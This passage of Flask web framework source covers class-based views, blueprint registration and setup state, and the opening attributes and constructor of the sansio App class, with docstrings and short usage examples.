__future__ import annotations import typing as t from . import typing as ft from .globals import current_app from .globals import request F = t.TypeVar("F", bound=t.Callable[..., t.Any]) http_method_funcs = frozenset( ["get", "post", "head", "options", "delete", "put", "trace", "patch"] ) class View: """Subclass this class and override :meth:`dispatch_request` to create a generic class-based view. 
Call :meth:`as_view` to create a view function that creates an instance of the class with the given arguments and calls its ``dispatch_request`` method with any URL variables. See :doc:`views` for a detailed guide. .. code-block:: python class Hello(View): init_every_request = False def dispatch_request(self, name): return f"Hello, {name}!" app.add_url_rule( "/hello/<name>", view_func=Hello.as_view("hello") ) Set :attr:`methods` on the class to change what methods the view accepts. Set :attr:`decorators` on the class to apply a list of decorators to the generated view function. Decorators applied to the class itself will not be applied to the generated view function! Set :attr:`init_every_request` to ``False`` for efficiency, unless you need to store request-global data on ``self``. """ #: The methods this view is registered for. Uses the same default #: (``["GET", "HEAD", "OPTIONS"]``) as ``route`` and #: ``add_url_rule`` by default. methods: t.ClassVar[t.Collection[str] | None] = None #: Control whether the ``OPTIONS`` method is handled automatically. #: Uses the same default (``True``) as ``route`` and #: ``add_url_rule`` by default. provide_automatic_options: t.ClassVar[bool | None] = None #: A list of decorators to apply, in order, to the generated view #: function. Remember that ``@decorator`` syntax is applied bottom #: to top, so the first decorator in the list would be the bottom #: decorator. #: #: .. versionadded:: 0.8 decorators: t.ClassVar[list[t.Callable[[F], F]]] = [] #: Create a new instance of this view class for every request by #: default. If a view subclass sets this to ``False``, the same #: instance is used for every request. #: #: A single instance is more efficient, especially if complex setup #: is done during init. However, storing data on ``self`` is no #: longer safe across requests, and :data:`~flask.g` should be used #: instead. #: #: .. versionadded:: 2.2 init_every_request: t.ClassVar[bool] = True def dispatch_request(self) -> ft.ResponseReturnValue: """The actual view function behavior. Subclasses must override this and return a valid response. Any variables from the URL rule are passed as keyword arguments. """ raise NotImplementedError() @classmethod def as_view( cls, name: str, *class_args: t.Any, **class_kwargs: t.Any ) -> ft.RouteCallable: """Convert the class into a view function that can be registered for a route. By default, the generated view will create a new instance of the view class for every request and call its :meth:`dispatch_request` method. If the view class sets :attr:`init_every_request` to ``False``, the same instance will be used for every request. Except for ``name``, all other arguments passed to this method are forwarded to the view class ``__init__`` method. .. versionchanged:: 2.2 Added the ``init_every_request`` class attribute. 
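
        For illustration, extra arguments are forwarded to the view class
        constructor (``Greeting`` is a hypothetical subclass)::

            class Greeting(View):
                def __init__(self, greeting):
                    self.greeting = greeting

                def dispatch_request(self, name):
                    return f"{self.greeting}, {name}!"

            app.add_url_rule(
                "/greet/<name>",
                view_func=Greeting.as_view("greet", "Hello"),
            )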
""" if cls.init_every_request: def view(**kwargs: t.Any) -> ft.ResponseReturnValue: self = view.view_class( # type: ignore[attr-defined] *class_args, **class_kwargs ) return current_app.ensure_sync(self.dispatch_request)(**kwargs) # type: ignore[no-any-return] else: self = cls(*class_args, **class_kwargs) def view(**kwargs: t.Any) -> ft.ResponseReturnValue: return current_app.ensure_sync(self.dispatch_request)(**kwargs) # type: ignore[no-any-return] if cls.decorators: view.__name__ = name view.__module__ = cls.__module__ for decorator in cls.decorators: view = decorator(view) # We attach the view class to the view function for two reasons: # first of all it allows us to easily figure out what class-based # view this thing came from, secondly it's also used for instantiating # the view class so you can actually replace it with something else # for testing purposes and debugging. view.view_class = cls # type: ignore view.__name__ = name view.__doc__ = cls.__doc__ view.__module__ = cls.__module__ view.methods = cls.methods # type: ignore view.provide_automatic_options = cls.provide_automatic_options # type: ignore return view class MethodView(View): """Dispatches request methods to the corresponding instance methods. For example, if you implement a ``get`` method, it will be used to handle ``GET`` requests. This can be useful for defining a REST API. :attr:`methods` is automatically set based on the methods defined on the class. See :doc:`views` for a detailed guide. .. code-block:: python class CounterAPI(MethodView): def get(self): return str(session.get("counter", 0)) def post(self): session["counter"] = session.get("counter", 0) + 1 return redirect(url_for("counter")) app.add_url_rule( "/counter", view_func=CounterAPI.as_view("counter") ) """ def __init_subclass__(cls, **kwargs: t.Any) -> None: super().__init_subclass__(**kwargs) if "methods" not in cls.__dict__: methods = set() for base in cls.__bases__: if getattr(base, "methods", None): methods.update(base.methods) # type: ignore[attr-defined] for key in http_method_funcs: if hasattr(cls, key): methods.add(key.upper()) if methods: cls.methods = methods def dispatch_request(self, **kwargs: t.Any) -> ft.ResponseReturnValue: meth = getattr(self, request.method.lower(), None) # If the request method is HEAD and we don't have a handler for it # retry with GET. if meth is None and request.method == "HEAD": meth = getattr(self, "get", None) assert meth is not None, f"Unimplemented method {request.method!r}" return current_app.ensure_sync(meth)(**kwargs) # type: ignore[no-any-return] File: src/flask/sansio/blueprints.py from __future__ import annotations import os import typing as t from collections import defaultdict from functools import update_wrapper from .. 
import typing as ft from .scaffold import _endpoint_from_view_func from .scaffold import _sentinel from .scaffold import Scaffold from .scaffold import setupmethod if t.TYPE_CHECKING: # pragma: no cover from .app import App DeferredSetupFunction = t.Callable[["BlueprintSetupState"], None] T_after_request = t.TypeVar("T_after_request", bound=ft.AfterRequestCallable[t.Any]) T_before_request = t.TypeVar("T_before_request", bound=ft.BeforeRequestCallable) T_error_handler = t.TypeVar("T_error_handler", bound=ft.ErrorHandlerCallable) T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) T_template_context_processor = t.TypeVar( "T_template_context_processor", bound=ft.TemplateContextProcessorCallable ) T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable) T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable) T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable) T_url_defaults = t.TypeVar("T_url_defaults", bound=ft.URLDefaultCallable) T_url_value_preprocessor = t.TypeVar( "T_url_value_preprocessor", bound=ft.URLValuePreprocessorCallable ) class BlueprintSetupState: """Temporary holder object for registering a blueprint with the application. An instance of this class is created by the :meth:`~flask.Blueprint.make_setup_state` method and later passed to all register callback functions. """ def __init__( self, blueprint: Blueprint, app: App, options: t.Any, first_registration: bool, ) -> None: #: a reference to the current application self.app = app #: a reference to the blueprint that created this setup state. self.blueprint = blueprint #: a dictionary with all options that were passed to the #: :meth:`~flask.Flask.register_blueprint` method. self.options = options #: as blueprints can be registered multiple times with the #: application and not everything wants to be registered #: multiple times on it, this attribute can be used to figure #: out if the blueprint was registered in the past already. self.first_registration = first_registration subdomain = self.options.get("subdomain") if subdomain is None: subdomain = self.blueprint.subdomain #: The subdomain that the blueprint should be active for, ``None`` #: otherwise. self.subdomain = subdomain url_prefix = self.options.get("url_prefix") if url_prefix is None: url_prefix = self.blueprint.url_prefix #: The prefix that should be used for all URLs defined on the #: blueprint. self.url_prefix = url_prefix self.name = self.options.get("name", blueprint.name) self.name_prefix = self.options.get("name_prefix", "") #: A dictionary with URL defaults that is added to each and every #: URL that was defined with the blueprint. self.url_defaults = dict(self.blueprint.url_values_defaults) self.url_defaults.update(self.options.get("url_defaults", ())) def add_url_rule( self, rule: str, endpoint: str | None = None, view_func: ft.RouteCallable | None = None, **options: t.Any, ) -> None: """A helper method to register a rule (and optionally a view function) to the application. The endpoint is automatically prefixed with the blueprint's name. 
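
        For illustration (hypothetical names), a rule ``"/users"`` on a
        blueprint named ``"admin"`` registered with ``url_prefix="/admin"``
        becomes the application rule ``"/admin/users"`` with endpoint
        ``"admin.users"``::

            bp = Blueprint("admin", __name__, url_prefix="/admin")

            @bp.route("/users")
            def users():
                ...

            app.register_blueprint(bp)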
""" if self.url_prefix is not None: if rule: rule = "/".join((self.url_prefix.rstrip("/"), rule.lstrip("/"))) else: rule = self.url_prefix options.setdefault("subdomain", self.subdomain) if endpoint is None: endpoint = _endpoint_from_view_func(view_func) # type: ignore defaults = self.url_defaults if "defaults" in options: defaults = dict(defaults, **options.pop("defaults")) self.app.add_url_rule( rule, f"{self.name_prefix}.{self.name}.{endpoint}".lstrip("."), view_func, defaults=defaults, **options, ) class Blueprint(Scaffold): """Represents a blueprint, a collection of routes and other app-related functions that can be registered on a real application later. A blueprint is an object that allows defining application functions without requiring an application object ahead of time. It uses the same decorators as :class:`~flask.Flask`, but defers the need for an application by recording them for later registration. Decorating a function with a blueprint creates a deferred function that is called with :class:`~flask.blueprints.BlueprintSetupState` when the blueprint is registered on an application. See :doc:`/blueprints` for more information. :param name: The name of the blueprint. Will be prepended to each endpoint name. :param import_name: The name of the blueprint package, usually ``__name__``. This helps locate the ``root_path`` for the blueprint. :param static_folder: A folder with static files that should be served by the blueprint's static route. The path is relative to the blueprint's root path. Blueprint static files are disabled by default. :param static_url_path: The url to serve static files from. Defaults to ``static_folder``. If the blueprint does not have a ``url_prefix``, the app's static route will take precedence, and the blueprint's static files won't be accessible. :param template_folder: A folder with templates that should be added to the app's template search path. The path is relative to the blueprint's root path. Blueprint templates are disabled by default. Blueprint templates have a lower precedence than those in the app's templates folder. :param url_prefix: A path to prepend to all of the blueprint's URLs, to make them distinct from the rest of the app's routes. :param subdomain: A subdomain that blueprint routes will match on by default. :param url_defaults: A dict of default values that blueprint routes will receive by default. :param root_path: By default, the blueprint will automatically set this based on ``import_name``. In certain situations this automatic detection can fail, so the path can be specified manually instead. .. versionchanged:: 1.1.0 Blueprints have a ``cli`` group to register nested CLI commands. The ``cli_group`` parameter controls the name of the group under the ``flask`` command. .. versionadded:: 0.7 """ _got_registered_once = False def __init__( self, name: str, import_name: str, static_folder: str | os.PathLike[str] | None = None, static_url_path: str | None = None, template_folder: str | os.PathLike[str] | None = None, url_prefix: str | None = None, subdomain: str | None = None, url_defaults: dict[str, t.Any] | None = None, root_path: str | None = None, cli_group: str | None = _sentinel, # type: ignore[assignment] ): super().__init__( import_name=import_name, static_folder=static_folder, static_url_path=static_url_path, template_folder=template_folder, root_path=root_path, ) if not name: raise ValueError("'name' may not be empty.") if "." in name: raise ValueError("'name' may not contain a dot '.' 
character.") self.name = name self.url_prefix = url_prefix self.subdomain = subdomain self.deferred_functions: list[DeferredSetupFunction] = [] if url_defaults is None: url_defaults = {} self.url_values_defaults = url_defaults self.cli_group = cli_group self._blueprints: list[tuple[Blueprint, dict[str, t.Any]]] = [] def _check_setup_finished(self, f_name: str) -> None: if self._got_registered_once: raise AssertionError( f"The setup method '{f_name}' can no longer be called on the blueprint" f" '{self.name}'. It has already been registered at least once, any" " changes will not be applied consistently.\n" "Make sure all imports, decorators, functions, etc. needed to set up" " the blueprint are done before registering it." ) @setupmethod def record(self, func: DeferredSetupFunction) -> None: """Registers a function that is called when the blueprint is registered on the application. This function is called with the state as argument as returned by the :meth:`make_setup_state` method. """ self.deferred_functions.append(func) @setupmethod def record_once(self, func: DeferredSetupFunction) -> None: """Works like :meth:`record` but wraps the function in another function that will ensure the function is only called once. If the blueprint is registered a second time on the application, the function passed is not called. """ def wrapper(state: BlueprintSetupState) -> None: if state.first_registration: func(state) self.record(update_wrapper(wrapper, func)) def make_setup_state( self, app: App, options: dict[str, t.Any], first_registration: bool = False ) -> BlueprintSetupState: """Creates an instance of :meth:`~flask.blueprints.BlueprintSetupState` object that is later passed to the register callback functions. Subclasses can override this to return a subclass of the setup state. """ return BlueprintSetupState(self, app, options, first_registration) @setupmethod def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None: """Register a :class:`~flask.Blueprint` on this blueprint. Keyword arguments passed to this method will override the defaults set on the blueprint. .. versionchanged:: 2.0.1 The ``name`` option can be used to change the (pre-dotted) name the blueprint is registered with. This allows the same blueprint to be registered multiple times with unique names for ``url_for``. .. versionadded:: 2.0 """ if blueprint is self: raise ValueError("Cannot register a blueprint on itself") self._blueprints.append((blueprint, options)) def register(self, app: App, options: dict[str, t.Any]) -> None: """Called by :meth:`Flask.register_blueprint` to register all views and callbacks registered on the blueprint with the application. Creates a :class:`.BlueprintSetupState` and calls each :meth:`record` callback with it. :param app: The application this blueprint is being registered with. :param options: Keyword arguments forwarded from :meth:`~Flask.register_blueprint`. .. versionchanged:: 2.3 Nested blueprints now correctly apply subdomains. .. versionchanged:: 2.1 Registering the same blueprint with the same name multiple times is an error. .. versionchanged:: 2.0.1 Nested blueprints are registered with their dotted name. This allows different blueprints with the same name to be nested at different locations. .. versionchanged:: 2.0.1 The ``name`` option can be used to change the (pre-dotted) name the blueprint is registered with. This allows the same blueprint to be registered multiple times with unique names for ``url_for``. 
""" name_prefix = options.get("name_prefix", "") self_name = options.get("name", self.name) name = f"{name_prefix}.{self_name}".lstrip(".") if name in app.blueprints: bp_desc = "this" if app.blueprints[name] is self else "a different" existing_at = f" '{name}'" if self_name != name else "" raise ValueError( f"The name '{self_name}' is already registered for" f" {bp_desc} blueprint{existing_at}. Use 'name=' to" f" provide a unique name." ) first_bp_registration = not any(bp is self for bp in app.blueprints.values()) first_name_registration = name not in app.blueprints app.blueprints[name] = self self._got_registered_once = True state = self.make_setup_state(app, options, first_bp_registration) if self.has_static_folder: state.add_url_rule( f"{self.static_url_path}/<path:filename>", view_func=self.send_static_file, # type: ignore[attr-defined] endpoint="static", ) # Merge blueprint data into parent. if first_bp_registration or first_name_registration: self._merge_blueprint_funcs(app, name) for deferred in self.deferred_functions: deferred(state) cli_resolved_group = options.get("cli_group", self.cli_group) if self.cli.commands: if cli_resolved_group is None: app.cli.commands.update(self.cli.commands) elif cli_resolved_group is _sentinel: self.cli.name = name app.cli.add_command(self.cli) else: self.cli.name = cli_resolved_group app.cli.add_command(self.cli) for blueprint, bp_options in self._blueprints: bp_options = bp_options.copy() bp_url_prefix = bp_options.get("url_prefix") bp_subdomain = bp_options.get("subdomain") if bp_subdomain is None: bp_subdomain = blueprint.subdomain if state.subdomain is not None and bp_subdomain is not None: bp_options["subdomain"] = bp_subdomain + "." + state.subdomain elif bp_subdomain is not None: bp_options["subdomain"] = bp_subdomain elif state.subdomain is not None: bp_options["subdomain"] = state.subdomain if bp_url_prefix is None: bp_url_prefix = blueprint.url_prefix if state.url_prefix is not None and bp_url_prefix is not None: bp_options["url_prefix"] = ( state.url_prefix.rstrip("/") + "/" + bp_url_prefix.lstrip("/") ) elif bp_url_prefix is not None: bp_options["url_prefix"] = bp_url_prefix elif state.url_prefix is not None: bp_options["url_prefix"] = state.url_prefix bp_options["name_prefix"] = name blueprint.register(app, bp_options) def _merge_blueprint_funcs(self, app: App, name: str) -> None: def extend( bp_dict: dict[ft.AppOrBlueprintKey, list[t.Any]], parent_dict: dict[ft.AppOrBlueprintKey, list[t.Any]], ) -> None: for key, values in bp_dict.items(): key = name if key is None else f"{name}.{key}" parent_dict[key].extend(values) for key, value in self.error_handler_spec.items(): key = name if key is None else f"{name}.{key}" value = defaultdict( dict, { code: {exc_class: func for exc_class, func in code_values.items()} for code, code_values in value.items() }, ) app.error_handler_spec[key] = value for endpoint, func in self.view_functions.items(): app.view_functions[endpoint] = func extend(self.before_request_funcs, app.before_request_funcs) extend(self.after_request_funcs, app.after_request_funcs) extend( self.teardown_request_funcs, app.teardown_request_funcs, ) extend(self.url_default_functions, app.url_default_functions) extend(self.url_value_preprocessors, app.url_value_preprocessors) extend(self.template_context_processors, app.template_context_processors) @setupmethod def add_url_rule( self, rule: str, endpoint: str | None = None, view_func: ft.RouteCallable | None = None, provide_automatic_options: bool | None = None, **options: t.Any, ) 
-> None: """Register a URL rule with the blueprint. See :meth:`.Flask.add_url_rule` for full documentation. The URL rule is prefixed with the blueprint's URL prefix. The endpoint name, used with :func:`url_for`, is prefixed with the blueprint's name. """ if endpoint and "." in endpoint: raise ValueError("'endpoint' may not contain a dot '.' character.") if view_func and hasattr(view_func, "__name__") and "." in view_func.__name__: raise ValueError("'view_func' name may not contain a dot '.' character.") self.record( lambda s: s.add_url_rule( rule, endpoint, view_func, provide_automatic_options=provide_automatic_options, **options, ) ) @setupmethod def app_template_filter( self, name: str | None = None ) -> t.Callable[[T_template_filter], T_template_filter]: """Register a template filter, available in any template rendered by the application. Equivalent to :meth:`.Flask.template_filter`. :param name: the optional name of the filter, otherwise the function name will be used. """ def decorator(f: T_template_filter) -> T_template_filter: self.add_app_template_filter(f, name=name) return f return decorator @setupmethod def add_app_template_filter( self, f: ft.TemplateFilterCallable, name: str | None = None ) -> None: """Register a template filter, available in any template rendered by the application. Works like the :meth:`app_template_filter` decorator. Equivalent to :meth:`.Flask.add_template_filter`. :param name: the optional name of the filter, otherwise the function name will be used. """ def register_template(state: BlueprintSetupState) -> None: state.app.jinja_env.filters[name or f.__name__] = f self.record_once(register_template) @setupmethod def app_template_test( self, name: str | None = None ) -> t.Callable[[T_template_test], T_template_test]: """Register a template test, available in any template rendered by the application. Equivalent to :meth:`.Flask.template_test`. .. versionadded:: 0.10 :param name: the optional name of the test, otherwise the function name will be used. """ def decorator(f: T_template_test) -> T_template_test: self.add_app_template_test(f, name=name) return f return decorator @setupmethod def add_app_template_test( self, f: ft.TemplateTestCallable, name: str | None = None ) -> None: """Register a template test, available in any template rendered by the application. Works like the :meth:`app_template_test` decorator. Equivalent to :meth:`.Flask.add_template_test`. .. versionadded:: 0.10 :param name: the optional name of the test, otherwise the function name will be used. """ def register_template(state: BlueprintSetupState) -> None: state.app.jinja_env.tests[name or f.__name__] = f self.record_once(register_template) @setupmethod def app_template_global( self, name: str | None = None ) -> t.Callable[[T_template_global], T_template_global]: """Register a template global, available in any template rendered by the application. Equivalent to :meth:`.Flask.template_global`. .. versionadded:: 0.10 :param name: the optional name of the global, otherwise the function name will be used. """ def decorator(f: T_template_global) -> T_template_global: self.add_app_template_global(f, name=name) return f return decorator @setupmethod def add_app_template_global( self, f: ft.TemplateGlobalCallable, name: str | None = None ) -> None: """Register a template global, available in any template rendered by the application. Works like the :meth:`app_template_global` decorator. Equivalent to :meth:`.Flask.add_template_global`. .. 
versionadded:: 0.10 :param name: the optional name of the global, otherwise the function name will be used. """ def register_template(state: BlueprintSetupState) -> None: state.app.jinja_env.globals[name or f.__name__] = f self.record_once(register_template) @setupmethod def before_app_request(self, f: T_before_request) -> T_before_request: """Like :meth:`before_request`, but before every request, not only those handled by the blueprint. Equivalent to :meth:`.Flask.before_request`. """ self.record_once( lambda s: s.app.before_request_funcs.setdefault(None, []).append(f) ) return f @setupmethod def after_app_request(self, f: T_after_request) -> T_after_request: """Like :meth:`after_request`, but after every request, not only those handled by the blueprint. Equivalent to :meth:`.Flask.after_request`. """ self.record_once( lambda s: s.app.after_request_funcs.setdefault(None, []).append(f) ) return f @setupmethod def teardown_app_request(self, f: T_teardown) -> T_teardown: """Like :meth:`teardown_request`, but after every request, not only those handled by the blueprint. Equivalent to :meth:`.Flask.teardown_request`. """ self.record_once( lambda s: s.app.teardown_request_funcs.setdefault(None, []).append(f) ) return f @setupmethod def app_context_processor( self, f: T_template_context_processor ) -> T_template_context_processor: """Like :meth:`context_processor`, but for templates rendered by every view, not only by the blueprint. Equivalent to :meth:`.Flask.context_processor`. """ self.record_once( lambda s: s.app.template_context_processors.setdefault(None, []).append(f) ) return f @setupmethod def app_errorhandler( self, code: type[Exception] | int ) -> t.Callable[[T_error_handler], T_error_handler]: """Like :meth:`errorhandler`, but for every request, not only those handled by the blueprint. Equivalent to :meth:`.Flask.errorhandler`. """ def decorator(f: T_error_handler) -> T_error_handler: def from_blueprint(state: BlueprintSetupState) -> None: state.app.errorhandler(code)(f) self.record_once(from_blueprint) return f return decorator @setupmethod def app_url_value_preprocessor( self, f: T_url_value_preprocessor ) -> T_url_value_preprocessor: """Like :meth:`url_value_preprocessor`, but for every request, not only those handled by the blueprint. Equivalent to :meth:`.Flask.url_value_preprocessor`. """ self.record_once( lambda s: s.app.url_value_preprocessors.setdefault(None, []).append(f) ) return f @setupmethod def app_url_defaults(self, f: T_url_defaults) -> T_url_defaults: """Like :meth:`url_defaults`, but for every request, not only those handled by the blueprint. Equivalent to :meth:`.Flask.url_defaults`. """ self.record_once( lambda s: s.app.url_default_functions.setdefault(None, []).append(f) ) return f File: src/flask/sansio/app.py from __future__ import annotations import logging import os import sys import typing as t from datetime import timedelta from itertools import chain from werkzeug.exceptions import Aborter from werkzeug.exceptions import BadRequest from werkzeug.exceptions import BadRequestKeyError from werkzeug.routing import BuildError from werkzeug.routing import Map from werkzeug.routing import Rule from werkzeug.sansio.response import Response from werkzeug.utils import cached_property from werkzeug.utils import redirect as _wz_redirect from .. 
import typing as ft from ..config import Config from ..config import ConfigAttribute from ..ctx import _AppCtxGlobals from ..helpers import _split_blueprint_path from ..helpers import get_debug_flag from ..json.provider import DefaultJSONProvider from ..json.provider import JSONProvider from ..logging import create_logger from ..templating import DispatchingJinjaLoader from ..templating import Environment from .scaffold import _endpoint_from_view_func from .scaffold import find_package from .scaffold import Scaffold from .scaffold import setupmethod if t.TYPE_CHECKING: # pragma: no cover from werkzeug.wrappers import Response as BaseResponse from ..testing import FlaskClient from ..testing import FlaskCliRunner from .blueprints import Blueprint T_shell_context_processor = t.TypeVar( "T_shell_context_processor", bound=ft.ShellContextProcessorCallable ) T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable) T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable) T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable) def _make_timedelta(value: timedelta | int | None) -> timedelta | None: if value is None or isinstance(value, timedelta): return value return timedelta(seconds=value) class App(Scaffold): """The flask object implements a WSGI application and acts as the central object. It is passed the name of the module or package of the application. Once it is created it will act as a central registry for the view functions, the URL rules, template configuration and much more. The name of the package is used to resolve resources from inside the package or the folder the module is contained in depending on if the package parameter resolves to an actual python package (a folder with an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file). For more information about resource loading, see :func:`open_resource`. Usually you create a :class:`Flask` instance in your main module or in the :file:`__init__.py` file of your package like this:: from flask import Flask app = Flask(__name__) .. admonition:: About the First Parameter The idea of the first parameter is to give Flask an idea of what belongs to your application. This name is used to find resources on the filesystem, can be used by extensions to improve debugging information and a lot more. So it's important what you provide there. If you are using a single module, `__name__` is always the correct value. If you however are using a package, it's usually recommended to hardcode the name of your package there. For example if your application is defined in :file:`yourapplication/app.py` you should create it with one of the two versions below:: app = Flask('yourapplication') app = Flask(__name__.split('.')[0]) Why is that? The application will work even with `__name__`, thanks to how resources are looked up. However it will make debugging more painful. Certain extensions can make assumptions based on the import name of your application. For example the Flask-SQLAlchemy extension will look for the code in your application that triggered an SQL query in debug mode. If the import name is not properly set up, that debugging information is lost. (For example it would only pick up SQL queries in `yourapplication.app` and not `yourapplication.views.frontend`) .. versionadded:: 0.7 The `static_url_path`, `static_folder`, and `template_folder` parameters were added. .. 
versionadded:: 0.8 The `instance_path` and `instance_relative_config` parameters were added. .. versionadded:: 0.11 The `root_path` parameter was added. .. versionadded:: 1.0 The ``host_matching`` and ``static_host`` parameters were added. .. versionadded:: 1.0 The ``subdomain_matching`` parameter was added. Subdomain matching needs to be enabled manually now. Setting :data:`SERVER_NAME` does not implicitly enable it. :param import_name: the name of the application package :param static_url_path: can be used to specify a different path for the static files on the web. Defaults to the name of the `static_folder` folder. :param static_folder: The folder with static files that is served at ``static_url_path``. Relative to the application ``root_path`` or an absolute path. Defaults to ``'static'``. :param static_host: the host to use when adding the static route. Defaults to None. Required when using ``host_matching=True`` with a ``static_folder`` configured. :param host_matching: set ``url_map.host_matching`` attribute. Defaults to False. :param subdomain_matching: consider the subdomain relative to :data:`SERVER_NAME` when matching routes. Defaults to False. :param template_folder: the folder that contains the templates that should be used by the application. Defaults to ``'templates'`` folder in the root path of the application. :param instance_path: An alternative instance path for the application. By default the folder ``'instance'`` next to the package or module is assumed to be the instance path. :param instance_relative_config: if set to ``True`` relative filenames for loading the config are assumed to be relative to the instance path instead of the application root. :param root_path: The path to the root of the application files. This should only be set manually when it can't be detected automatically, such as for namespace packages. """ #: The class of the object assigned to :attr:`aborter`, created by #: :meth:`create_aborter`. That object is called by #: :func:`flask.abort` to raise HTTP errors, and can be #: called directly as well. #: #: Defaults to :class:`werkzeug.exceptions.Aborter`. #: #: .. versionadded:: 2.2 aborter_class = Aborter #: The class that is used for the Jinja environment. #: #: .. versionadded:: 0.11 jinja_environment = Environment #: The class that is used for the :data:`~flask.g` instance. #: #: Example use cases for a custom class: #: #: 1. Store arbitrary attributes on flask.g. #: 2. Add a property for lazy per-request database connectors. #: 3. Return None instead of AttributeError on unexpected attributes. #: 4. Raise exception if an unexpected attr is set, a "controlled" flask.g. #: #: In Flask 0.9 this property was called `request_globals_class` but it #: was changed in 0.10 to :attr:`app_ctx_globals_class` because the #: flask.g object is now application context scoped. #: #: .. versionadded:: 0.10 app_ctx_globals_class = _AppCtxGlobals #: The class that is used for the ``config`` attribute of this app. #: Defaults to :class:`~flask.Config`. #: #: Example use cases for a custom class: #: #: 1. Default values for certain config options. #: 2. Access to config values through attributes in addition to keys. #: #: .. versionadded:: 0.11 config_class = Config #: The testing flag. Set this to ``True`` to enable the test mode of #: Flask extensions (and in the future probably also Flask itself). #: For example this might activate test helpers that have an #: additional runtime cost which should not be enabled by default. 
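    #:
    #: A minimal sketch (illustrative)::
    #:
    #:     app = Flask(__name__)
    #:     app.testing = True  # same as app.config["TESTING"] = True
    #:     client = app.test_client()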
#: #: If this is enabled and PROPAGATE_EXCEPTIONS is not changed from the #: default it's implicitly enabled. #: #: This attribute can also be configured from the config with the #: ``TESTING`` configuration key. Defaults to ``False``. testing = ConfigAttribute[bool]("TESTING") #: If a secret key is set, cryptographic components can use this to #: sign cookies and other things. Set this to a complex random value #: when you want to use the secure cookie for instance. #: #: This attribute can also be configured from the config with the #: :data:`SECRET_KEY` configuration key. Defaults to ``None``. secret_key = ConfigAttribute[t.Union[str, bytes, None]]("SECRET_KEY") #: A :class:`~datetime.timedelta` which is used to set the expiration #: date of a permanent session. The default is 31 days which makes a #: permanent session survive for roughly one month. #: #: This attribute can also be configured from the config with the #: ``PERMANENT_SESSION_LIFETIME`` configuration key. Defaults to #: ``timedelta(days=31)`` permanent_session_lifetime = ConfigAttribute[timedelta]( "PERMANENT_SESSION_LIFETIME", get_converter=_make_timedelta, # type: ignore[arg-type] ) json_provider_class: type[JSONProvider] = DefaultJSONProvider """A subclass of :class:`~flask.json.provider.JSONProvider`. An instance is created and assigned to :attr:`app.json` when creating the app. The default, :class:`~flask.json.provider.DefaultJSONProvider`, uses Python's built-in :mod:`json` library. A different provider can use a different JSON library. .. versionadded:: 2.2 """ #: Options that are passed to the Jinja environment in #: :meth:`create_jinja_environment`. Changing these options after #: the environment is created (accessing :attr:`jinja_env`) will #: have no effect. #: #: .. versionchanged:: 1.1.0 #: This is a ``dict`` instead of an ``ImmutableDict`` to allow #: easier configuration. #: jinja_options: dict[str, t.Any] = {} #: The rule object to use for URL rules created. This is used by #: :meth:`add_url_rule`. Defaults to :class:`werkzeug.routing.Rule`. #: #: .. versionadded:: 0.7 url_rule_class = Rule #: The map object to use for storing the URL rules and routing #: configuration parameters. Defaults to :class:`werkzeug.routing.Map`. #: #: .. versionadded:: 1.1.0 url_map_class = Map #: The :meth:`test_client` method creates an instance of this test #: client class. Defaults to :class:`~flask.testing.FlaskClient`. #: #: .. versionadded:: 0.7 test_client_class: type[FlaskClient] | None = None #: The :class:`~click.testing.CliRunner` subclass, by default #: :class:`~flask.testing.FlaskCliRunner` that is used by #: :meth:`test_cli_runner`. Its ``__init__`` method should take a #: Flask app object as the first argument. #: #: .. 
versionadded:: 1.0 test_cli_runner_class: type[FlaskCliRunner] | None = None default_config: dict[str, t.Any] response_class: type[Response] def __init__( self, import_name: str, static_url_path: str | None = None, static_folder: str | os.PathLike[str] | None = "static", static_host: str | None = None, host_matching: bool = False, subdomain_matching: bool = False, template_folder: str | os.PathLike[str] | None = "templates", instance_path: str | None = None, instance_relative_config: bool = False, root_path: str | None = None, ) -> None: super().__init__( import_name=import_name, static_folder=static_folder, static_url_path=static_url_path, template_folder=template_folder, root_path=root_path, ) if instance_path is None: instance_path = self.auto_find_instance_path() elif not os.path.isabs(instance_path): raise ValueError( "If an instance path is provided it must be absolute." " A relative path was given instead." ) #: Holds the path to the instance folder. #: #: .. versionadded:: 0.8 self.instance_path = instance_path #: The configuration dictionary as :class:`Config`. This behaves #: exactly like a regular dictionary but supports additional methods #: to load a config from files. self.config = self.make_config(instance_relative_config) #: An instance of :attr:`aborter_class` created by #: :meth:`make_aborter`. This is called by :func:`flask.abort` #: to raise HTTP errors, and can be called directly as well. #: #: .. versionadded:: 2.2 #: Moved from ``flask.abort``, which calls this object. self.aborter = self.make_aborter() self.json: JSONProvider = self.json_provider_class(self) """Provides access to JSON methods. Functions in ``flask.json`` will call methods on this provider when the application context is active. Used for handling JSON requests and responses. An instance of :attr:`json_provider_class`. Can be customized by changing that attribute on a subclass, or by assigning to this attribute afterwards. The default, :class:`~flask.json.provider.DefaultJSONProvider`, uses Python's built-in :mod:`json` library. A different provider can use a different JSON library. .. versionadded:: 2.2 """ #: A list of functions that are called by #: :meth:`handle_url_build_error` when :meth:`.url_for` raises a #: :exc:`~werkzeug.routing.BuildError`. Each function is called #: with ``error``, ``endpoint`` and ``values``. If a function #: returns ``None`` or raises a ``BuildError``, it is skipped. #: Otherwise, its return value is returned by ``url_for``. #: #: .. versionadded:: 0.9 self.url_build_error_handlers: list[ t.Callable[[Exception, str, dict[str, t.Any]], str] ] = [] #: A list of functions that are called when the application context #: is destroyed. Since the application context is also torn down #: if the request ends this is the place to store code that disconnects #: from databases. #: #: .. versionadded:: 0.9 self.teardown_appcontext_funcs: list[ft.TeardownCallable] = [] #: A list of shell context processor functions that should be run #: when a shell context is created. #: #: .. versionadded:: 0.11 self.shell_context_processors: list[ft.ShellContextProcessorCallable] = [] #: Maps registered blueprint names to blueprint objects. The #: dict retains the order the blueprints were registered in. #: Blueprints can be registered multiple times, this dict does #: not track how often they were attached. #: #: .. versionadded:: 0.7 self.blueprints: dict[str, Blueprint] = {} 